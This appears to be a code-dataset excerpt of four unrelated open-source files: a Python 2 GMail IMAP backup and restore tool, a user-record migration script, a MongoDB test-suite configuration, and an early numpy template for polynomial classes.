typ, numbers = self._call(self.con.search, None, *where)
numbers = numbers[0].split()
return numbers
def lsub(self):
status, ret = self._call(self.con.lsub)
ret = [imap_unescape(i) for i in ret]
return ret
def list(self):
status, ret = self._call(self.con.list)
ret = [imap_unescape(i) for i in ret]
return ret
def create(self, label):
self._call(self.con.create, label)
def copy(self, message_set, label):
self._call(self.con.copy, message_set, label)
def append(self, mailbox, flags, msg_date, msg):
self._call(self.con.append, mailbox, flags, msg_date, msg)
def store(self, nums, state, flags):
self._call(self.con.store, nums, state, flags)
def expunge(self):
self._call(self.con.expunge)
def delete(self, mailbox):
self._call(self.con.delete, mailbox)
def _call(self, method, *args, **kwargs):
# Dirty hack:
method_name = method.im_func.__name__
while True:
try:
method = getattr(self.con, method_name)
ret = method(*args, **kwargs)
return ret
except:
e = sys.exc_info()[1]
if self.recoverableError(e):
self.notifier.nLog(_("Network error occured, disconnected"))
if not self.reconnect():
raise e
else:
raise e
class EmailStorage(object):
@classmethod
def createStorage(cls, fn, notifier):
ext = os.path.splitext(fn.split('#')[0])[1]
if ext.lower() == '.zip':
return ZipStorage(fn, notifier)
else:
return DirectoryStorage(fn, notifier)
def idsOfMessages(self):
'''Returns the set of stored msg_ids'''
def iterBackups(self, since_time=None, before_time=None, logging=True):
'''Iterates over backups specified by parameters and yields pairs (storageid, message)'''
def store(self, msg):
'''Stores message `msg`'''
def getLabelAssignment(self):
'''Returns label assignment'''
def updateLabelAssignment(self, assignment):
'''Updates label assignment with `assignment`'''
def lastStamp(self):
'''Return the stamp of the last backup, the output is in the format of _convertTime()'''
def updateStamp(self, last_time):
'''Updates the stamp of the last backup to last_time'''
def _templateDict(self, msg):
'''Creates dictionary used in the template expansion
'''
d = _parseMsgDate(msg)
ret = {}
ret['YEAR'] = time.strftime('%Y', d)
ret['MONTH'] = time.strftime('%m', d)
ret['DAY'] = time.strftime('%d', d)
ret['HOUR'] = time.strftime('%H', d)
ret['MINUTE'] = time.strftime('%M', d)
ret['SECOND'] = time.strftime('%S', d)
ret['FROM'], ret['SUBJ'] = _getMsgInitials(msg)
ret['FROM'] = ret['FROM'].lower()
ret = dict((k, v.replace('/', '_')) for (k, v) in ret.iteritems())
return ret
class DirectoryStorage(EmailStorage):
def __init__(self, fn, notifier):
self.setFnAndFragment(fn)
self.notifier = notifier
self._makeMaildir()
self._readDownloadedIds()
self._readLabelAssignment()
def setFnAndFragment(self, fn):
'''Sets the filename and the pattern for naming the files in the
storage
'''
items = fn.split("#", 1)
if len(items) == 1:
self.fn = items[0]
self.fragment = '${YEAR}/${MONTH}/${YEAR}${MONTH}${DAY}-${HOUR}${MINUTE}${SECOND}-${FROM}-${SUBJ}'
else:
self.fn = items[0]
self.fragment = items[1]
self.fn = os.path.expanduser(self.fn)
self.fragment = string.Template(self.fragment)
def iterBackups(self, since_time=None, before_time=None, logging=True):
def walkBackups(top):
'''Walks trough the dn and returns path originating in dn and ending with '.eml'
'''
for dn, sub_dns, fns in os.walk(top):
rel_dn = dn[len(top):].lstrip(os.path.sep)
for fn in fns:
if os.path.splitext(fn)[1].lower() != '.eml':
continue
yield os.path.join(rel_dn, fn)
listing = sorted(walkBackups(self.fn))
for idx, msg_fn in enumerate(listing):
try:
full_msg_fn = os.path.join(self.fn, msg_fn)
fr = file(full_msg_fn, 'rb')
try:
msg = fr.read()
finally:
fr.close()
msg_date2 = _getMailDate(msg)
msg_date2_num = time.mktime(msg_date2)
if (since_time is None or since_time < msg_date2_num) \
and (before_time is None or msg_date2_num < before_time):
yield msg_fn, msg
if logging:
from_address, subject = _getMailInitials(msg)
self.notifier.nEmailRestore(from_address, subject, idx+1, len(listing))
else:
if logging:
from_address, subject = _getMailInitials(msg)
self.notifier.nEmailRestoreSkip(from_address, subject, idx+1, len(listing))
except:
if isinstance(sys.exc_info()[1], GeneratorExit):
break
self.notifier.handleError(_("Error occured while reading e-mail from disc"))
def _makeMaildir(self):
dirs = [self.fn, os.path.join(self.fn, 'cur'), os.path.join(self.fn, 'new'), os.path.join(self.fn, 'tmp')]
try:
for i in dirs:
os.makedirs(i)
except OSError:
pass
def idsFilename(self):
return os.path.join(self.fn, 'ids.txt')
def labelFilename(self):
return os.path.join(self.fn, 'labels.txt')
def stampFile(self):
return os.path.join(self.fn, 'stamp')
def _readDownloadedIds(self):
cache = self.idsFilename()
self.message_iid2fn = {}
if not os.path.isfile(cache):
for msg_fn, msg in self.iterBackups(logging=False):
try:
msg_iid = _getMailInternalId(msg)
self.message_iid2fn[msg_iid] = msg_fn
except:
self.notifier.handleError(_("Error while reading MessageID from stored message"))
else:
fr = file(cache, 'r')
for line in fr:
try:
items = line.strip().split(None, 1)
try:
msg_fn = items[0]
msg_iid = items[1]
self.message_iid2fn[msg_iid] = msg_fn
except IndexError:
pass
except:
self.notifier.handleError(_("Bad line in file with cached MessageIDs"))
fr.close()
self.message_fn2iid = _revertDict(self.message_iid2fn)
def _writeDownloadedIds(self):
fn = self.idsFilename()
if os.path.exists(fn):
os.remove(fn)
fw = file(fn, 'w')
for msg_iid, msg_fn in sorted(self.message_iid2fn.items(), key=lambda item: item[1]):
try:
line = '%s\t%s' % (msg_fn, msg_iid)
print >> fw, line
except:
self.notifier.nError(_("Errorneous message in file: %s, please report it to <honza.svec@gmail.com>") % msg_fn)
fw.close()
def idsOfMessages(self):
return set(self.message_iid2fn)
def getLabelAssignment(self):
return self.message_iid2labels.copy()
def updateLabelAssignment(self, assignment):
self.message_iid2labels.update(assignment)
self._writeLabelAssignment()
def _cleanFilename(self, fn):
'''Cleans the filename - removes diacritics and other filesystem special characters
'''
fn = _removeDiacritics(fn)
fn = fn.encode('utf-8', 'replace')
if os.name == 'posix':
good_chars = set('!"#\'()+-0123456789:;<=>@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]_abcdefghijklmnopqrstuvwxyz{}/\\')
elif os.name == 'nt':
good_chars = set("!#'()+-0123456789;=@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]_abcdefghijklmnopqrstuvwxyz{}/\\")
else:
good_chars = set("+-0123456789=@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz/\\")
ret = ''
for c in fn:
if c not in good_chars:
c = '_'
ret += c
ret = re.sub('_+', '_', ret)
ret = ret[:240]
return ret
def getMailFilename(self, mail):
msg = email.message_from_string(mail)
values = self._templateDict(msg)
fn = self.fragment.safe_substitute(values)
fn = self._cleanFilename(fn)
return fn
def store(self, msg):
msg_fn = self.getMailFilename(msg)
msg_dn = os.path.dirname(msg_fn)
full_dn = os.path.join(self.fn, msg_dn)
if not os.path.isdir(full_dn):
os.makedirs(full_dn)
msg_iid = _getMailInternalId(msg)
idx = 1
while True:
msg_fn_num = '%s-%01d.eml'%(msg_fn, idx)
idx += 1
full_fn_num = os.path.join(self.fn, msg_fn_num)
if not os.path.exists(full_fn_num):
break
self.message_iid2fn[msg_iid] = msg_fn_num
self.message_fn2iid[msg_fn_num] = msg_iid
fw = file(full_fn_num, 'wb')
try:
fw.write(msg)
finally:
fw.close()
def storeComplete(self):
self._writeDownloadedIds()
def _backupLabelAssignment(self):
assign_fn = self.labelFilename()
assign_fn_old = self.labelFilename()+'.bak'
if os.path.exists(assign_fn):
if os.path.exists(assign_fn_old):
os.remove(assign_fn_old)
shutil.copy(assign_fn, assign_fn_old)
def _escapeLabels(self, labels):
utf8_labels = [imap_decode(s) for s in labels]
return ' '.join(s.replace('\t', '\\\t').replace(' ', '\\ ') for s in utf8_labels)
def _unescapeLabels(self, string):
lst = string.split()
ret = []
for i in lst:
if ret and ret[-1][-1] == '\\':
ret[-1] = ret[-1][:-1]+' '+i
else:
ret.append(i)
ret = [imap_encode(s) for s in ret]
return ret
def _readLabelAssignment(self):
fn = self.labelFilename()
self.message_iid2labels = {}
if os.path.isfile(fn):
fr = codecs.open(fn, 'r', 'utf-8')
for line in fr:
items = line.split(None, 1)
msg_fn = items[0]
msg_iid = self.message_fn2iid.get(msg_fn, None)
if msg_iid is not None:
self.message_iid2labels[msg_iid] = self._unescapeLabels(items[1])
fr.close()
def _writeLabelAssignment(self):
self._backupLabelAssignment()
fn = self.labelFilename()
if os.path.exists(fn):
os.remove(fn)
fw = codecs.open(fn, 'w', 'utf-8')
for msg_iid, labels in sorted(self.message_iid2labels.items()):
msg_fn = self.message_iid2fn.get(msg_iid)
if msg_fn is None:
# We are unable do determine the filename for msg_iid
continue
print >> fw, '%s\t%s' % (msg_fn, self._escapeLabels(labels))
fw.close()
def lastStamp(self):
stampFile = self.stampFile()
try:
fr = file(stampFile, 'r')
for line in fr:
last_time = line.strip()
break
fr.close()
except IOError:
last_time = None
if last_time is not None:
last_time = time.strptime(last_time, '%Y%m%d')
return last_time
def updateStamp(self, last_time):
if last_time is None:
return
last_time = time.strftime('%Y%m%d', last_time)
stampFile = self.stampFile()
if os.path.exists(stampFile):
os.remove(stampFile)
fw = file(stampFile, 'w')
print >> fw, last_time
fw.close()
class ZipStorage(DirectoryStorage):
def __init__(self, fn, notifier):
self.setFnAndFragment(fn)
self.notifier = notifier
self._openZipFile()
self._readDownloadedIds()
self._readLabelAssignment()
def setFnAndFragment(self, fn):
super(ZipStorage, self).setFnAndFragment(fn)
self.zip_fn = self.fn
self.fn = os.path.dirname(self.fn)
def _openZipFile(self):
try:
os.makedirs(self.fn)
except OSError:
pass
def idsFilename(self):
fn = os.path.splitext(self.zip_fn)[0] + '.ids.txt'
return fn
def labelFilename(self):
fn = os.path.splitext(self.zip_fn)[0] + '.labels.txt'
return fn
def stampFile(self):
fn = os.path.splitext(self.zip_fn)[0] + '.stamp.txt'
return fn
def iterBackups(self, since_time=None, before_time=None, logging=True):
if os.path.exists(self.zip_fn):
zip = zipfile.ZipFile(self.zip_fn, 'r')
listing = [i.filename for i in zip.infolist()]
# skip labels.txt and labels.txt.bak files
for idx, msg_fn in enumerate(listing):
try:
msg = zip.read(msg_fn)
msg_date2 = _getMailDate(msg)
msg_date2_num = time.mktime(msg_date2)
if (since_time is None or since_time < msg_date2_num) \
and (before_time is None or msg_date2_num < before_time):
yield msg_fn, msg
if logging:
from_address, subject = _getMailInitials(msg)
self.notifier.nEmailRestore(from_address, subject, idx+1, len(listing))
else:
if logging:
from_address, subject = _getMailInitials(msg)
self.notifier.nEmailRestoreSkip(from_address, subject, idx+1, len(listing))
except:
if isinstance(sys.exc_info()[1], GeneratorExit):
break
self.notifier.handleError(_("Error occured while reading e-mail from disc"))
def store(self, msg):
if not os.path.exists(self.zip_fn):
zip = zipfile.ZipFile(self.zip_fn, 'w', zipfile.ZIP_DEFLATED)
else:
zip = zipfile.ZipFile(self.zip_fn, 'a', zipfile.ZIP_DEFLATED)
listing = zip.namelist()
msg_fn = self.getMailFilename(msg)
msg_iid = _getMailInternalId(msg)
idx = 1
while True:
msg_fn_num = '%s-%01d.eml'%(msg_fn, idx)
idx += 1
if not msg_fn_num in listing:
break
self.message_iid2fn[msg_iid] = msg_fn_num
self.message_fn2iid[msg_fn_num] = msg_iid
zip.writestr(msg_fn_num, msg)
zip.close()
class GMailBackup(object):
def __init__(self, username, password, notifier, lang=None):
self.notifier = notifier
self.username = username
self.password = password
self.connection = GMailConnection(username, password, notifier, lang)
def iterMails(self, where, skip=[]):
self.connection.select(self.connection.ALL_MAILS)
numbers = self.connection.search(where)
skipped = 0
for idx, num in enumerate(numbers):
try:
imsg_id = self.connection.fetchMessageId(num)
if imsg_id in skip:
skipped += 1
self.notifier.nEmailBackupSkip(idx+1, len(numbers), skipped, len(skip))
continue
msg = self.connection.fetchMessage(num)
yield msg
from_address, subject = _getMailInitials(msg)
self.notifier.nEmailBackup(from_address, subject, idx+1, len(numbers))
except:
if isinstance(sys.exc_info()[1], GeneratorExit):
break
self.notifier.handleError(_("Error occured while downloading e-mail"))
self.connection.close()
def getLabels(self):
ret = self.connection.list()
labels = []
for i in ret:
match = re.match(r'^(\(.*\))\s".*?"\s"(.*)"\s*$', i)
flags = match.group(1)
if '\\HasNoChildren' not in flags:
continue
label = match.group(2)
if not re.match(r'^\[.*\].*$', label) and label != 'INBOX':
labels.append(label)
labels.append('INBOX')
return labels
def msgsWithLabel(self, label, where=['ALL']):
self.connection.select(label)
retries = 0
while True:
try:
numbers = self.connection.search(where)
break
except imaplib.IMAP4.error:
retries += 1
if retries > MAX_LABEL_RETRIES:
self.notifier.nError(_("Cannot backup the assignment of label: %s") % label)
raise StopIteration
else:
self.connection.select(label)
for num in numbers:
yield self.connection.fetchMessageId(num)
def labelAssignment(self, where=['ALL']):
assignment = {}
self.connection.connect()
for i in self.getLabels():
try:
for msg in self.msgsWithLabel(i, where):
if msg not in assignment:
assignment[msg] = set()
assignment[msg].add(i)
except:
self.notifier.handleError(_("Error while doing backup of label %r") % i)
return assignment
def backup(self, fn, where=['ALL'], stamp=False):
storage = EmailStorage.createStorage(fn, self.notifier)
last_time = storage.lastStamp()
if last_time is not None:
since = _convertTime(time.strftime('%Y%m%d', last_time))
if stamp:
try:
idx = where.index('SINCE')
where[idx+1] = since
except ValueError:
where.append('SINCE')
where.append(since)
self.notifier.nVersion()
self.notifier.nBackup(False, self.username, fn)
self.connection.connect()
downloaded = storage.idsOfMessages()
try:
for msg in self.iterMails(where, downloaded):
try:
storage.store(msg)
msg_date = _getMailDate(msg)
if msg_date > last_time or last_time is None:
last_time = msg_date
except:
self.notifier.handleError(_("Error while saving e-mail"))
finally:
storage.storeComplete()
self.notifier.nLabelsBackup(False)
assignment = self.labelAssignment(where)
storage.updateLabelAssignment(assignment)
self.notifier.nLabelsBackup(True)
storage.updateStamp(last_time)
self.notifier.nBackup(True, self.username, fn)
def restoreLabels(self, assignment, min_date, max_date):
self.connection.select(self.connection.ALL_MAILS)
where = []
where.append('SINCE')
where.append(min_date)
where.append('BEFORE')
where.append(max_date)
numbers = self.connection.search(where)
message_by_labels = {}
labels = set()
for idx, num in enumerate(numbers):
try:
imsg_id = self.connection.fetchMessageId(num)
if imsg_id in assignment:
for label in assignment[imsg_id]:
if label not in message_by_labels:
message_by_labels[label] = []
message_by_labels[label].append(num)
labels.add(label)
self.notifier.nLabelsRestore(idx+1, len(numbers))
except:
self.notifier.handleError(_("Error while getting MessageID"))
for label in labels:
try:
message_set = message_by_labels[label]
message_set = ','.join(message_set)
self.connection.create(label)
self.connection.copy(message_set, label)
except:
self.notifier.handleError(_("Error while restoring label %r") % label)
def restore(self, fn, since_time=None, before_time=None):
if since_time:
since_time = _convertTimeToNum(since_time)
if before_time:
before_time = _convertTimeToNum(before_time)
self.notifier.nVersion()
self.notifier.nRestore(False, self.username, fn)
self.connection.connect()
storage = EmailStorage.createStorage(fn, self.notifier)
dates = set()
for msg_fn, msg in storage.iterBackups(since_time, before_time):
try:
msg_date = _getMailIMAPDate(msg)
msg_date2 = _getMailDate(msg)
msg_iid = _getMailInternalId(msg)
self.connection.append(self.connection.ALL_MAILS, "(\Seen)", msg_date, msg)
dates.add(msg_date2)
except:
self.notifier.handleError(_("Error while restoring e-mail"))
if dates:
min_date, max_date = _shiftDates(min(dates), max(dates))
min_date = imaplib.Time2Internaldate(min_date)
max_date = imaplib.Time2Internaldate(max_date)
assignment = storage.getLabelAssignment()
self.restoreLabels(assignment, min_date, max_date)
self.notifier.nRestore(True, self.username, fn)
def clear(self):
self.notifier.nVersion()
self.notifier.nClear(False, self.username)
self.connection.connect()
self.connection.select(self.connection.ALL_MAILS)
data = self.connection.search(['ALL'])
nums = ','.join(data)
if nums:
self.connection.copy(nums, self.connection.TRASH)
self.connection.store(nums, 'FLAGS.SILENT', '\\Deleted')
self.connection.expunge()
self.connection.select(self.connection.TRASH)
data = self.connection.search(['ALL'])
if nums:
nums = ','.join(data)
self.connection.store(nums, 'FLAGS.SILENT', '\\Deleted')
self.connection.expunge()
for label in self.getLabels():
self.connection.delete(label)
self.connection.close()
self.notifier.nClear(True, self.username)
def list(self):
self.connection.connect(noguess=True)
ret = self.connection.list()
for i in ret:
match = re.match(r'^\(.*\)\s".*"\s"(.*)"\s*$', i)
box = match.groups(1)[0]
self.connection.select(box)
try:
data = self.connection.search(['ALL'])
num = len(data)
except imaplib.IMAP4.error:
num = -1
yield box, num
def isNewVersion(self):
try:
fr = urllib.urlopen(VERSION_URL)
try:
data = fr.read()
url = 'http://code.google.com/p/gmail-backup-com/downloads/list'
version_match = re.search('<td class="id"><a href=".*?">r(\d+)</a></td>', data)
if version_match:
try:
new_revision = int(version_match.group(1))
if new_revision > int(GMB_REVISION):
return new_revision, url
except ValueError:
pass
return None, None
finally:
fr.close()
except:
return None, None
def reportNewVersion(self):
version, url = self.isNewVersion()
if version:
msg = _('New version of GMail Backup is available!\nYou can download version %s here:\n%s') % (version, url)
else:
msg = _("You are using the latest version of GMail Backup.")
self.notifier.nLog(msg)
return version | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""Migrate users whose email_verifications=None to have
email_verifications={} (which is now the default value).
"""
import sys
import logging
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.models import User
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def do_migration():
users = User.find(Q('email_verifications', 'eq', None))
migrated = 0
for user in users:
logger.info('Setting email_verifications for user {} to {{}}'.format(user._id))
user.email_verifications = {}
user.save()
migrated += 1
logger.info('Migrated {} users'.format(migrated))
def main(dry=True):
init_app(set_backends=True, routes=False)
with TokuTransaction():
do_migration()
if dry:
raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry) | unknown | codeparrot/codeparrot-clean | ||
base_suite: sharded_collections_jscore_passthrough_base
description: >-
This suite runs through all fuzzer generated tests and ensures that the 'queryShapeHash'
attribute returned in explain is same for multiple explain invocations, across all nodes of two
sharded clusters, with different binaries version.
overrides:
- "query_shape_hash_stability.multiversion_cluster_fuzzer_fixture_last_continuous"
- "query_shape_hash_stability.fuzzer_selector"
eval:
- "query_shape_hash_stability.eval_query_shape_hash_stability" | unknown | github | https://github.com/mongodb/mongo | buildscripts/resmokeconfig/matrix_suites/mappings/sharded_collections_query_shape_hash_stability_aggregate_fuzzer_last_continuous_new_old.yml |
"""
Template for the Chebyshev and Polynomial classes.
This module houses a Python string module Template object (see, e.g.,
http://docs.python.org/library/string.html#template-strings) used by
the `polynomial` and `chebyshev` modules to implement their respective
`Polynomial` and `Chebyshev` classes. It provides a mechanism for easily
creating additional specific polynomial classes (e.g., Legendre, Jacobi,
etc.) in the future, such that all these classes will have a common API.
"""
import string
import sys
if sys.version_info[0] >= 3:
rel_import = "from . import"
else:
rel_import = "import"
polytemplate = string.Template('''
from __future__ import division
REL_IMPORT polyutils as pu
import numpy as np
class $name(pu.PolyBase) :
"""A $name series class.
Parameters
----------
coef : array_like
$name coefficients, in increasing order. For example,
``(1, 2, 3)`` implies ``P_0 + 2P_1 + 3P_2`` where the
``P_i`` are a graded polynomial basis.
domain : (2,) array_like
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped to
the interval ``$domain`` by shifting and scaling.
Attributes
----------
coef : (N,) array
$name coefficients, from low to high.
domain : (2,) array_like
Domain that is mapped to ``$domain``.
Class Attributes
----------------
maxpower : int
Maximum power allowed, i.e., the largest number ``n`` such that
``p(x)**n`` is allowed. This is to limit runaway polynomial size.
domain : (2,) ndarray
Default domain of the class.
Notes
-----
It is important to specify the domain for many uses of graded polynomial,
for instance in fitting data. This is because many of the important
properties of the polynomial basis only hold in a specified interval and
thus the data must be mapped into that domain in order to benefit.
Examples
--------
"""
# Limit runaway size. T_n^m has degree n*2^m
maxpower = 16
# Default domain
domain = np.array($domain)
# Don't let participate in array operations. Value doesn't matter.
__array_priority__ = 0
def __init__(self, coef, domain=$domain) :
[coef, domain] = pu.as_series([coef, domain], trim=False)
if len(domain) != 2 :
raise ValueError("Domain has wrong number of elements.")
self.coef = coef
self.domain = domain
def __repr__(self):
format = "%s(%s, %s)"
coef = repr(self.coef)[6:-1]
domain = repr(self.domain)[6:-1]
return format % ('$name', coef, domain)
def __str__(self) :
format = "%s(%s, %s)"
return format % ('$nick', str(self.coef), str(self.domain))
# Pickle and copy
def __getstate__(self) :
ret = self.__dict__.copy()
ret['coef'] = self.coef.copy()
ret['domain'] = self.domain.copy()
return ret
def __setstate__(self, dict) :
self.__dict__ = dict
# Call
def __call__(self, arg) :
off, scl = pu.mapparms(self.domain, $domain)
arg = off + scl*arg
return ${nick}val(arg, self.coef)
def __iter__(self) :
return iter(self.coef)
def __len__(self) :
return len(self.coef)
# Numeric properties.
def __neg__(self) :
return self.__class__(-self.coef, self.domain)
def __pos__(self) :
return self
def __add__(self, other) :
"""Returns sum"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}add(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}add(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __sub__(self, other) :
"""Returns difference"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}sub(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}sub(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __mul__(self, other) :
"""Returns product"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}mul(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}mul(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __div__(self, other):
# set to __floordiv__ /.
return self.__floordiv__(other)
def __truediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if isinstance(other, self.__class__) :
if len(other.coef) == 1 :
coef = div(self.coef, other.coef)
else :
return NotImplemented
elif np.isscalar(other) :
coef = self.coef/other
else :
return NotImplemented
return self.__class__(coef, self.domain)
def __floordiv__(self, other) :
"""Returns the quotient."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __mod__(self, other) :
"""Returns the remainder."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __divmod__(self, other) :
"""Returns quo, remainder"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
def __pow__(self, other) :
try :
coef = ${nick}pow(self.coef, other, maxpower = self.maxpower)
except :
raise
return self.__class__(coef, self.domain)
def __radd__(self, other) :
try :
coef = ${nick}add(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rsub__(self, other):
try :
coef = ${nick}sub(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rmul__(self, other) :
try :
coef = ${nick}mul(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rdiv__(self, other):
# set to __floordiv__ /.
return self.__rfloordiv__(other)
def __rtruediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if len(self.coef) == 1 :
try :
quo, rem = ${nick}div(other, self.coef[0])
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __rfloordiv__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __rmod__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __rdivmod__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
# Enhance me
# some augmented arithmetic operations could be added here
def __eq__(self, other) :
res = isinstance(other, self.__class__) \
and len(self.coef) == len(other.coef) \
and np.all(self.domain == other.domain) \
and np.all(self.coef == other.coef)
return res
def __ne__(self, other) :
return not self.__eq__(other)
#
# Extra numeric functions.
#
def degree(self) :
"""The degree of the series.
Notes
-----
.. versionadded:: 1.5.0
"""
return len(self) - 1
def cutdeg(self, deg) :
"""Truncate series to the given degree.
Reduce the degree of the $name series to `deg` by discarding the
high order terms. If `deg` is greater than the current degree a
copy of the current series is returned. This can be useful in least
squares where the coefficients of the high degree terms may be very
small.
Parameters
----------
deg : non-negative int
The series is reduced to degree `deg` by discarding the high
order terms. The value of `deg` must be a non-negative integer.
Returns
-------
new_instance : $name
New instance of $name with reduced degree.
Notes
-----
.. versionadded:: 1.5.0
"""
return self.truncate(deg + 1)
def convert(self, domain=None, kind=None) :
"""Convert to different class and/or domain.
Parameters
----------
domain : {None, array_like}
The domain of the new series type instance. If the value is is
``None``, then the default domain of `kind` is used.
kind : {None, class}
The polynomial series type class to which the current instance
should be converted. If kind is ``None``, then the class of the
current instance is used.
Returns
-------
new_series_instance : `kind`
The returned class can be of different type than the current
instance and/or have a different domain.
Examples
--------
Notes
-----
Conversion between domains and class types can result in
numerically ill defined series.
"""
if kind is None :
kind = $name
if domain is None :
domain = kind.domain
return self(kind.identity(domain))
def mapparms(self) :
"""Return the mapping parameters.
The returned values define a linear map ``off + scl*x`` that is
applied to the input arguments before the series is evaluated. The
of the map depend on the domain; if the current domain is equal to
the default domain ``$domain`` the resulting map is the identity.
If the coeffients of the ``$name`` instance are to be used
separately, then the linear function must be substituted for the
``x`` in the standard representation of the base polynomials.
Returns
-------
off, scl : floats or complex
The mapping function is defined by ``off + scl*x``.
Notes:
------
If the current domain is the interval ``[l_1, r_1]`` and the default
interval is ``[l_2, r_2]``, then the linear mapping function ``L`` is
defined by the equations:
L(l_1) = l_2
L(r_1) = r_2
"""
return pu.mapparms(self.domain, $domain)
def trim(self, tol=0) :
"""Remove small leading coefficients
Remove leading coefficients until a coefficient is reached whose
absolute value greater than `tol` or the beginning of the series is
reached. If all the coefficients would be removed the series is set to
``[0]``. A new $name instance is returned with the new coefficients.
The current instance remains unchanged.
Parameters
----------
tol : non-negative number.
All trailing coefficients less than `tol` will be removed.
Returns
-------
new_instance : $name
Contains the new set of coefficients.
"""
return self.__class__(pu.trimcoef(self.coef, tol), self.domain)
def truncate(self, size) :
"""Truncate series to length `size`.
Reduce the $name series to length `size` by discarding the high
degree terms. The value of `size` must be a positive integer. This
can be useful in least squares where the coefficients of the
high degree terms may be very small.
Parameters
----------
size : positive int
The series is reduced to length `size` by discarding the high
degree terms. The value of `size` must be a positive integer.
Returns
-------
new_instance : $name
New instance of $name with truncated coefficients.
"""
isize = int(size)
if isize != size or isize < 1 :
raise ValueError("size must be a positive integer")
if isize >= len(self.coef) :
return self.__class__(self.coef, self.domain)
else :
return self.__class__(self.coef[:isize], self.domain)
def copy(self) :
"""Return a copy.
A new instance of $name is returned that has the same
coefficients and domain as the current instance.
Returns
-------
new_instance : $name
New instance of $name with the same coefficients and domain.
"""
return self.__class__(self.coef, self.domain)
def integ(self, m=1, k=[], lbnd=None) :
"""Integrate.
Return an instance of $name that is the definite integral of the
current series. Refer to `${nick}int` for full documentation.
Parameters
----------
m : non-negative int
The number of integrations to perform.
k : array_like
Integration constants. The first constant is applied to the
first integration, the second to the second, and so on. The
list of values must less than or equal to `m` in length and any
missing values are set to zero.
lbnd : Scalar
The lower bound of the definite integral.
Returns
-------
integral : $name
The integral of the series using the same domain.
See Also
--------
`${nick}int` : similar function.
`${nick}der` : similar function for derivative.
"""
off, scl = self.mapparms()
if lbnd is None :
lbnd = 0
else :
lbnd = off + scl*lbnd
coef = ${nick}int(self.coef, m, k, lbnd, 1./scl)
return self.__class__(coef, self.domain)
def deriv(self, m=1):
"""Differentiate.
Return an instance of $name that is the derivative of the current
series. Refer to `${nick}der` for full documentation.
Parameters
----------
m : non-negative int
The number of integrations to perform.
Returns
-------
derivative : $name
The derivative of the series using the same domain.
See Also
--------
`${nick}der` : similar function.
`${nick}int` : similar function for integration.
"""
off, scl = self.mapparms()
coef = ${nick}der(self.coef, m, scl)
return self.__class__(coef, self.domain)
def roots(self) :
"""Return list of roots.
Return ndarray of roots for this series. See `${nick}roots` for
full documentation. Note that the accuracy of the roots is likely to
decrease the further outside the domain they lie.
See Also
--------
`${nick}roots` : similar function
`${nick}fromroots` : function to go generate series from roots.
"""
roots = ${nick}roots(self.coef)
return pu.mapdomain(roots, $domain, self.domain)
def linspace(self, n=100):
"""Return x,y values at equally spaced points in domain.
Returns x, y values at `n` equally spaced points across domain.
Here y is the value of the polynomial at the points x. This is
intended as a plotting aid.
Paramters
---------
n : int, optional
Number of point pairs to return. The default value is 100.
Returns
-------
x, y : ndarrays
``x`` is equal to linspace(self.domain[0], self.domain[1], n)
``y`` is the polynomial evaluated at ``x``.
.. versionadded:: 1.5.0
"""
x = np.linspace(self.domain[0], self.domain[1], n)
y = self(x)
return x, y
@staticmethod
def fit(x, y, deg, domain=None, rcond=None, full=False, w=None) :
"""Least squares fit to data.
Return a `$name` instance that is the least squares fit to the data
`y` sampled at `x`. Unlike ${nick}fit, the domain of the returned
instance can be specified and this will often result in a superior
fit with less chance of ill conditioning. See ${nick}fit for full
documentation of the implementation.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
